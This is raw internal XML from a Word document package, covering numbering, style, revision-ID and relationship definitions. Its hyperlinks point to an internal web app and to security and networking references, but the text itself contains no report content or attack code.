  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00AF4680" w:rsidRDefault="00AF4680" w:rsidP="009A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A4C9F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DCAC652"/>
    <w:lvl w:ilvl="0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="*"/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="05FA7FD9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="873ECA70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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="080C6132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047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4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26" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0AB60D52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726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2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7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8" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0C8D2FE2"/>
    <w:multiLevelType w:val="single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6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0E4E76BE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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="249F2E4F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="04F2F230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2C8934BE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5A48171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66B7375"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FC46D30C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7"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="18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0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3A4E7B2E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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3AC02726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2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3B67193B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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3B990FE6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2932B0B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BD29EC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-2689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25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237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223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20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9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7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5952" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="43F41D98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6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="45115102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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4F327E34"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9FDEA464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ascii="Arial" w:hAnsi="Arial" w:cs="Arial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cs="Arial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cs="Arial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  <w:sz w:val="28"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="510168D0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9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="588E0977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0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5A734930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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5BA05F1D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2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="60252509"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="27D21966"/>
    <w:lvl w:ilvl="0" w:tplc="C8F4D2F6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1571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F0A1872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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="705F4B79"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B28E83F2"/>
    <w:lvl w:ilvl="0" w:tplc="B6AA1122">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2484" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:asciiTheme="minorHAnsi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71AE6997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6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7B9853A0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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7D5624C9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0A14DB52"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3408" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="3"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3573" w:hanging="525"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="3"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="376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412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12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48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4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84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848" w:hanging="1800"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="28" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7F0836C9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21"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="7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20"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="8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AB"/>
    <w:rsid w:val="000062FF"/>
    <w:rsid w:val="00013EA5"/>
    <w:rsid w:val="00015DE3"/>
    <w:rsid w:val="00022ED2"/>
    <w:rsid w:val="00025045"/>
    <w:rsid w:val="00036A5D"/>
    <w:rsid w:val="00046E12"/>
    <w:rsid w:val="00052A31"/>
    <w:rsid w:val="000536AA"/>
    <w:rsid w:val="0005686A"/>
    <w:rsid w:val="00057B33"/>
    <w:rsid w:val="000673F6"/>
    <w:rsid w:val="00087FBC"/>
    <w:rsid w:val="00093CAB"/>
    <w:rsid w:val="000A6729"/>
    <w:rsid w:val="000C72B3"/>
    <w:rsid w:val="000D038A"/>
    <w:rsid w:val="000D3326"/>
    <w:rsid w:val="000D4E90"/>
    <w:rsid w:val="000E26E7"/>
    <w:rsid w:val="000E2EE2"/>
    <w:rsid w:val="000E35CD"/>
    <w:rsid w:val="000E6FA1"/>
    <w:rsid w:val="000F06E4"/>
    <w:rsid w:val="00101063"/>
    <w:rsid w:val="001031B5"/>
    <w:rsid w:val="001151C8"/>
    <w:rsid w:val="001247A7"/>
    <w:rsid w:val="001557DC"/>
    <w:rsid w:val="001609AB"/>
    <w:rsid w:val="001702C9"/>
    <w:rsid w:val="00174603"/>
    <w:rsid w:val="00174B27"/>
    <w:rsid w:val="00184BA7"/>
    <w:rsid w:val="00185ED4"/>
    <w:rsid w:val="00190AAD"/>
    <w:rsid w:val="00191402"/>
    <w:rsid w:val="001923D7"/>
    <w:rsid w:val="001968AD"/>
    <w:rsid w:val="00196FF2"/>
    <w:rsid w:val="00197C78"/>
    <w:rsid w:val="001A5B8E"/>
    <w:rsid w:val="001A5DFB"/>
    <w:rsid w:val="001B2F09"/>
    <w:rsid w:val="001C4F4D"/>
    <w:rsid w:val="001C7028"/>
    <w:rsid w:val="001D6374"/>
    <w:rsid w:val="001E29F7"/>
    <w:rsid w:val="001F4C0E"/>
    <w:rsid w:val="001F5050"/>
    <w:rsid w:val="00201EA5"/>
    <w:rsid w:val="0020416E"/>
    <w:rsid w:val="00204E77"/>
    <w:rsid w:val="00211EF9"/>
    <w:rsid w:val="002151B5"/>
    <w:rsid w:val="00224FD8"/>
    <w:rsid w:val="00236FDF"/>
    <w:rsid w:val="00240857"/>
    <w:rsid w:val="0024287E"/>
    <w:rsid w:val="0024453B"/>
    <w:rsid w:val="00265100"/>
    <w:rsid w:val="00265310"/>
    <w:rsid w:val="00271556"/>
    <w:rsid w:val="002719E7"/>
    <w:rsid w:val="0027244F"/>
    <w:rsid w:val="00284BB3"/>
    <w:rsid w:val="00294FE0"/>
    <w:rsid w:val="0029632F"/>
    <w:rsid w:val="00296685"/>
    <w:rsid w:val="002A0DD8"/>
    <w:rsid w:val="002A5CE5"/>
    <w:rsid w:val="002B1EF3"/>
    <w:rsid w:val="002C0836"/>
    <w:rsid w:val="002C467E"/>
    <w:rsid w:val="002C52C4"/>
    <w:rsid w:val="002D16A4"/>
    <w:rsid w:val="002D20FB"/>
    <w:rsid w:val="002D3D74"/>
    <w:rsid w:val="002D4365"/>
    <w:rsid w:val="002E34E0"/>
    <w:rsid w:val="00310E6C"/>
    <w:rsid w:val="00311F69"/>
    <w:rsid w:val="003164B7"/>
    <w:rsid w:val="003178EE"/>
    <w:rsid w:val="00322A98"/>
    <w:rsid w:val="00323A19"/>
    <w:rsid w:val="003243CE"/>
    <w:rsid w:val="003249F0"/>
    <w:rsid w:val="00337476"/>
    <w:rsid w:val="0036432A"/>
    <w:rsid w:val="003745C8"/>
    <w:rsid w:val="00384949"/>
    <w:rsid w:val="00384E80"/>
    <w:rsid w:val="003A39F6"/>
    <w:rsid w:val="003A5422"/>
    <w:rsid w:val="003B06CC"/>
    <w:rsid w:val="003B3BB8"/>
    <w:rsid w:val="003D0913"/>
    <w:rsid w:val="003D141C"/>
    <w:rsid w:val="003D23F9"/>
    <w:rsid w:val="003D4E1D"/>
    <w:rsid w:val="003E1ACB"/>
    <w:rsid w:val="003E38DF"/>
    <w:rsid w:val="003E4BBF"/>
    <w:rsid w:val="003E7654"/>
    <w:rsid w:val="003F0DBB"/>
    <w:rsid w:val="003F3756"/>
    <w:rsid w:val="003F40A0"/>
    <w:rsid w:val="003F4807"/>
    <w:rsid w:val="003F56AB"/>
    <w:rsid w:val="003F64B7"/>
    <w:rsid w:val="0040058D"/>
    <w:rsid w:val="00412443"/>
    <w:rsid w:val="00415B47"/>
    <w:rsid w:val="00417333"/>
    <w:rsid w:val="00430E45"/>
    <w:rsid w:val="00455AB7"/>
    <w:rsid w:val="00456110"/>
    <w:rsid w:val="0045732E"/>
    <w:rsid w:val="004741DB"/>
    <w:rsid w:val="00477883"/>
    <w:rsid w:val="0048383A"/>
    <w:rsid w:val="004850DA"/>
    <w:rsid w:val="0049098B"/>
    <w:rsid w:val="0049317F"/>
    <w:rsid w:val="004B1DCC"/>
    <w:rsid w:val="004B4607"/>
    <w:rsid w:val="004C1B81"/>
    <w:rsid w:val="004C783E"/>
    <w:rsid w:val="004D25DD"/>
    <w:rsid w:val="004E0A86"/>
    <w:rsid w:val="004E12C9"/>
    <w:rsid w:val="004E1803"/>
    <w:rsid w:val="004E2307"/>
    <w:rsid w:val="004F3071"/>
    <w:rsid w:val="004F40AA"/>
    <w:rsid w:val="00503644"/>
    <w:rsid w:val="00510DD2"/>
    <w:rsid w:val="005135D8"/>
    <w:rsid w:val="00517685"/>
    <w:rsid w:val="00530877"/>
    <w:rsid w:val="005352FA"/>
    <w:rsid w:val="00537F7B"/>
    <w:rsid w:val="00544368"/>
    <w:rsid w:val="00546F66"/>
    <w:rsid w:val="00557D26"/>
    <w:rsid w:val="00564674"/>
    <w:rsid w:val="00564D7D"/>
    <w:rsid w:val="00567ED2"/>
    <w:rsid w:val="00572A0D"/>
    <w:rsid w:val="00594AD8"/>
    <w:rsid w:val="005967D5"/>
    <w:rsid w:val="005A089C"/>
    <w:rsid w:val="005A5292"/>
    <w:rsid w:val="005A68AB"/>
    <w:rsid w:val="005B3078"/>
    <w:rsid w:val="005B5243"/>
    <w:rsid w:val="005D3B2A"/>
    <w:rsid w:val="005D6685"/>
    <w:rsid w:val="005D6A2A"/>
    <w:rsid w:val="005E239F"/>
    <w:rsid w:val="005E45A3"/>
    <w:rsid w:val="005F4015"/>
    <w:rsid w:val="005F470B"/>
    <w:rsid w:val="005F6E06"/>
    <w:rsid w:val="005F79D1"/>
    <w:rsid w:val="006035EF"/>
    <w:rsid w:val="00603B2C"/>
    <w:rsid w:val="00605CFE"/>
    <w:rsid w:val="006071F5"/>
    <w:rsid w:val="00623C1F"/>
    <w:rsid w:val="0062442F"/>
    <w:rsid w:val="00626AC7"/>
    <w:rsid w:val="00630433"/>
    <w:rsid w:val="0063700A"/>
    <w:rsid w:val="00640C50"/>
    <w:rsid w:val="00641283"/>
    <w:rsid w:val="006473CA"/>
    <w:rsid w:val="00650630"/>
    <w:rsid w:val="006515FB"/>
    <w:rsid w:val="00654CAB"/>
    <w:rsid w:val="00654DEF"/>
    <w:rsid w:val="006612A3"/>
    <w:rsid w:val="006635A8"/>
    <w:rsid w:val="00670E3E"/>
    <w:rsid w:val="00676E62"/>
    <w:rsid w:val="0068102E"/>
    <w:rsid w:val="006853AA"/>
    <w:rsid w:val="006876BB"/>
    <w:rsid w:val="006A38D8"/>
    <w:rsid w:val="006A578B"/>
    <w:rsid w:val="006B700D"/>
    <w:rsid w:val="006C08DA"/>
    <w:rsid w:val="006C21E3"/>
    <w:rsid w:val="006C2DFF"/>
    <w:rsid w:val="006C31FD"/>
    <w:rsid w:val="006D580D"/>
    <w:rsid w:val="006D73FC"/>
    <w:rsid w:val="006E2559"/>
    <w:rsid w:val="006F6948"/>
    <w:rsid w:val="006F6982"/>
    <w:rsid w:val="00702C53"/>
    <w:rsid w:val="007067BC"/>
    <w:rsid w:val="0070782B"/>
    <w:rsid w:val="00707948"/>
    <w:rsid w:val="00707E1B"/>
    <w:rsid w:val="007260B8"/>
    <w:rsid w:val="00736DBC"/>
    <w:rsid w:val="0074275B"/>
    <w:rsid w:val="00751591"/>
    <w:rsid w:val="00762DFF"/>
    <w:rsid w:val="00763063"/>
    <w:rsid w:val="0076417A"/>
    <w:rsid w:val="007649FC"/>
    <w:rsid w:val="00765ACB"/>
    <w:rsid w:val="00771369"/>
    <w:rsid w:val="00777DDF"/>
    <w:rsid w:val="007804EC"/>
    <w:rsid w:val="00790EC9"/>
    <w:rsid w:val="00791E90"/>
    <w:rsid w:val="007A267D"/>
    <w:rsid w:val="007D3513"/>
    <w:rsid w:val="007E2011"/>
    <w:rsid w:val="007E46A7"/>
    <w:rsid w:val="007F5D29"/>
    <w:rsid w:val="00801C36"/>
    <w:rsid w:val="00807BFC"/>
    <w:rsid w:val="00817857"/>
    <w:rsid w:val="00824DA2"/>
    <w:rsid w:val="00825FE5"/>
    <w:rsid w:val="00827015"/>
    <w:rsid w:val="00830E80"/>
    <w:rsid w:val="00831A3E"/>
    <w:rsid w:val="00834FAA"/>
    <w:rsid w:val="00837F79"/>
    <w:rsid w:val="00846A20"/>
    <w:rsid w:val="0084777A"/>
    <w:rsid w:val="00857C40"/>
    <w:rsid w:val="00870818"/>
    <w:rsid w:val="008719F1"/>
    <w:rsid w:val="00881DA5"/>
    <w:rsid w:val="00885145"/>
    <w:rsid w:val="008872A1"/>
    <w:rsid w:val="00892814"/>
    <w:rsid w:val="00892BCB"/>
    <w:rsid w:val="008A7473"/>
    <w:rsid w:val="008A79EE"/>
    <w:rsid w:val="008A7BB2"/>
    <w:rsid w:val="008B447D"/>
    <w:rsid w:val="008C2F72"/>
    <w:rsid w:val="008C6DC7"/>
    <w:rsid w:val="008D02E1"/>
    <w:rsid w:val="008D0530"/>
    <w:rsid w:val="00902307"/>
    <w:rsid w:val="00906B58"/>
    <w:rsid w:val="00915C31"/>
    <w:rsid w:val="00925B9A"/>
    <w:rsid w:val="00930BEA"/>
    <w:rsid w:val="00934569"/>
    <w:rsid w:val="00935C82"/>
    <w:rsid w:val="0094228B"/>
    <w:rsid w:val="00944F31"/>
    <w:rsid w:val="00945AD3"/>
    <w:rsid w:val="00967B9F"/>
    <w:rsid w:val="00985A8F"/>
    <w:rsid w:val="009A2041"/>
    <w:rsid w:val="009A6B56"/>
    <w:rsid w:val="009A7448"/>
    <w:rsid w:val="009B1DC9"/>
    <w:rsid w:val="009B63C8"/>
    <w:rsid w:val="009B7BA9"/>
    <w:rsid w:val="009C102E"/>
    <w:rsid w:val="009C3F25"/>
    <w:rsid w:val="009C4FBC"/>
    <w:rsid w:val="009C5396"/>
    <w:rsid w:val="009C7901"/>
    <w:rsid w:val="009D0F86"/>
    <w:rsid w:val="009E0E00"/>
    <w:rsid w:val="009F24CC"/>
    <w:rsid w:val="009F30B5"/>
    <w:rsid w:val="009F42DE"/>
    <w:rsid w:val="009F7A3C"/>
    <w:rsid w:val="00A03082"/>
    <w:rsid w:val="00A13973"/>
    <w:rsid w:val="00A206ED"/>
    <w:rsid w:val="00A218DE"/>
    <w:rsid w:val="00A24E0E"/>
    <w:rsid w:val="00A338A6"/>
    <w:rsid w:val="00A40129"/>
    <w:rsid w:val="00A63EAA"/>
    <w:rsid w:val="00A66072"/>
    <w:rsid w:val="00A83EB9"/>
    <w:rsid w:val="00A93306"/>
    <w:rsid w:val="00A93C57"/>
    <w:rsid w:val="00A9523B"/>
    <w:rsid w:val="00A966EC"/>
    <w:rsid w:val="00AA00BE"/>
    <w:rsid w:val="00AB1C01"/>
    <w:rsid w:val="00AB57A1"/>
    <w:rsid w:val="00AB5BB3"/>
    <w:rsid w:val="00AB70E4"/>
    <w:rsid w:val="00AC10DC"/>
    <w:rsid w:val="00AF248B"/>
    <w:rsid w:val="00AF4680"/>
    <w:rsid w:val="00B01036"/>
    <w:rsid w:val="00B04AF1"/>
    <w:rsid w:val="00B135C4"/>
    <w:rsid w:val="00B15531"/>
    <w:rsid w:val="00B17B93"/>
    <w:rsid w:val="00B25D43"/>
    <w:rsid w:val="00B3361B"/>
    <w:rsid w:val="00B42017"/>
    <w:rsid w:val="00B51059"/>
    <w:rsid w:val="00B560B0"/>
    <w:rsid w:val="00B71318"/>
    <w:rsid w:val="00B7146E"/>
    <w:rsid w:val="00B71A0F"/>
    <w:rsid w:val="00B800D4"/>
    <w:rsid w:val="00B846D4"/>
    <w:rsid w:val="00B854D0"/>
    <w:rsid w:val="00B959F5"/>
    <w:rsid w:val="00BA5C02"/>
    <w:rsid w:val="00BA7CEE"/>
    <w:rsid w:val="00BB751B"/>
    <w:rsid w:val="00BC05C8"/>
    <w:rsid w:val="00BC1742"/>
    <w:rsid w:val="00BC1926"/>
    <w:rsid w:val="00BC5B4A"/>
    <w:rsid w:val="00BC5DD9"/>
    <w:rsid w:val="00BD2955"/>
    <w:rsid w:val="00BD33F6"/>
    <w:rsid w:val="00BE4C3F"/>
    <w:rsid w:val="00BE58C0"/>
    <w:rsid w:val="00BF1C7D"/>
    <w:rsid w:val="00BF5785"/>
    <w:rsid w:val="00BF6E55"/>
    <w:rsid w:val="00C0198A"/>
    <w:rsid w:val="00C07952"/>
    <w:rsid w:val="00C07971"/>
    <w:rsid w:val="00C12C3D"/>
    <w:rsid w:val="00C306C8"/>
    <w:rsid w:val="00C32280"/>
    <w:rsid w:val="00C343E2"/>
    <w:rsid w:val="00C366F7"/>
    <w:rsid w:val="00C36925"/>
    <w:rsid w:val="00C3730D"/>
    <w:rsid w:val="00C52360"/>
    <w:rsid w:val="00C52795"/>
    <w:rsid w:val="00C624EB"/>
    <w:rsid w:val="00C815A6"/>
    <w:rsid w:val="00C8356E"/>
    <w:rsid w:val="00C86D69"/>
    <w:rsid w:val="00C97F3F"/>
    <w:rsid w:val="00CA5E41"/>
    <w:rsid w:val="00CB425C"/>
    <w:rsid w:val="00CC2CE7"/>
    <w:rsid w:val="00CC3790"/>
    <w:rsid w:val="00CD0164"/>
    <w:rsid w:val="00CD779F"/>
    <w:rsid w:val="00CE03DD"/>
    <w:rsid w:val="00CE2FCC"/>
    <w:rsid w:val="00CE3185"/>
    <w:rsid w:val="00CE5109"/>
    <w:rsid w:val="00CE679F"/>
    <w:rsid w:val="00D02F49"/>
    <w:rsid w:val="00D04B46"/>
    <w:rsid w:val="00D20770"/>
    <w:rsid w:val="00D24FC5"/>
    <w:rsid w:val="00D32318"/>
    <w:rsid w:val="00D4218C"/>
    <w:rsid w:val="00D43F1D"/>
    <w:rsid w:val="00D44803"/>
    <w:rsid w:val="00D45386"/>
    <w:rsid w:val="00D46C6B"/>
    <w:rsid w:val="00D50B6F"/>
    <w:rsid w:val="00D57137"/>
    <w:rsid w:val="00D602EF"/>
    <w:rsid w:val="00D60336"/>
    <w:rsid w:val="00D62225"/>
    <w:rsid w:val="00D65D65"/>
    <w:rsid w:val="00D76012"/>
    <w:rsid w:val="00D77DFF"/>
    <w:rsid w:val="00D918FF"/>
    <w:rsid w:val="00D967F2"/>
    <w:rsid w:val="00D975CE"/>
    <w:rsid w:val="00DB70B5"/>
    <w:rsid w:val="00DD39B4"/>
    <w:rsid w:val="00DD5893"/>
    <w:rsid w:val="00DE2F1B"/>
    <w:rsid w:val="00DF0646"/>
    <w:rsid w:val="00E01CAE"/>
    <w:rsid w:val="00E068E6"/>
    <w:rsid w:val="00E15301"/>
    <w:rsid w:val="00E158B8"/>
    <w:rsid w:val="00E16F18"/>
    <w:rsid w:val="00E27C4B"/>
    <w:rsid w:val="00E31790"/>
    <w:rsid w:val="00E400F9"/>
    <w:rsid w:val="00E4538D"/>
    <w:rsid w:val="00E453D6"/>
    <w:rsid w:val="00E513AC"/>
    <w:rsid w:val="00E52417"/>
    <w:rsid w:val="00E52521"/>
    <w:rsid w:val="00E650F5"/>
    <w:rsid w:val="00E77F75"/>
    <w:rsid w:val="00E92559"/>
    <w:rsid w:val="00E92ED1"/>
    <w:rsid w:val="00E9423C"/>
    <w:rsid w:val="00E95ED3"/>
    <w:rsid w:val="00EB09F2"/>
    <w:rsid w:val="00EC2366"/>
    <w:rsid w:val="00EC5D2B"/>
    <w:rsid w:val="00ED180C"/>
    <w:rsid w:val="00ED7438"/>
    <w:rsid w:val="00EF59CB"/>
    <w:rsid w:val="00F018F3"/>
    <w:rsid w:val="00F02825"/>
    <w:rsid w:val="00F04EFF"/>
    <w:rsid w:val="00F05851"/>
    <w:rsid w:val="00F149B2"/>
    <w:rsid w:val="00F15B60"/>
    <w:rsid w:val="00F15F82"/>
    <w:rsid w:val="00F248C0"/>
    <w:rsid w:val="00F24DE3"/>
    <w:rsid w:val="00F31428"/>
    <w:rsid w:val="00F3154F"/>
    <w:rsid w:val="00F52870"/>
    <w:rsid w:val="00F5692A"/>
    <w:rsid w:val="00F6048E"/>
    <w:rsid w:val="00F71E4B"/>
    <w:rsid w:val="00F8563B"/>
    <w:rsid w:val="00F87AAF"/>
    <w:rsid w:val="00F935DA"/>
    <w:rsid w:val="00FA1088"/>
    <w:rsid w:val="00FB2992"/>
    <w:rsid w:val="00FB3CB1"/>
    <w:rsid w:val="00FC374A"/>
    <w:rsid w:val="00FC41D3"/>
    <w:rsid w:val="00FD3807"/>
    <w:rsid w:val="00FE4996"/>
    <w:rsid w:val="00FE6FEB"/>
    <w:rsid w:val="00FF1C9C"/>
    <w:rsid w:val="00FF400C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5FF522-6279-4145-A3D6-497268E0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C7"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="004F3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4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40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4287E"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E92E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DBC"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Footer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DBC"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="004F3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unhideWhenUsed/>
    <w:rsid w:val="004F3071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4F3071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4F3071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4F3071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4F3071"/>
    <w:pPr>
      <w:ind w:left="1415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4F3071"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SalutationChar">
    <w:name w:val="Salutation Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Salutation"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="004F3071"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListBullet2">
    <w:name w:val="List Bullet 2"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004F3071"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="25"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Endereointerno">
    <w:name w:val="Endereço interno"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="004F3071"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004F30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F3071"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyTextIndent">
    <w:name w:val="Body Text Indent"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextIndentChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004F307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F3071"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Referncia">
    <w:name w:val="Referência"/>
    <w:basedOn w:val="BodyText"/>
    <w:rsid w:val="004F3071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F307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F3071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4F3071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F3071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4F307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F3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7.jpeg"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.jpg"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.0.58/vacina/login.php?logado=false" TargetMode="External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hyperlink" Target="https://pt.wikipedia.org/wiki/NetBIOS" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3.org/TR/cors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g"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pt.wikipedia.org/wiki/Network_Time_Protoco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32.jpg"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/pt-br/library/cc736675(v=ws.10)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g"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.teamsid.com/worst-passwords-2015/" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://docs.oracle.com/cd/B28359_01/appdev.111/b28370/comment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hyperlink" Target="http://software.dzhuvinov.com/cors-filter.html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://192.168.0.58/vacina/index.php?pg=servidores" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.jpeg"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackertarget.com/sqlmap-post-request-injection/" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/pt-br/library/ms188621(v=sql.105)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g"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.jpeg"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 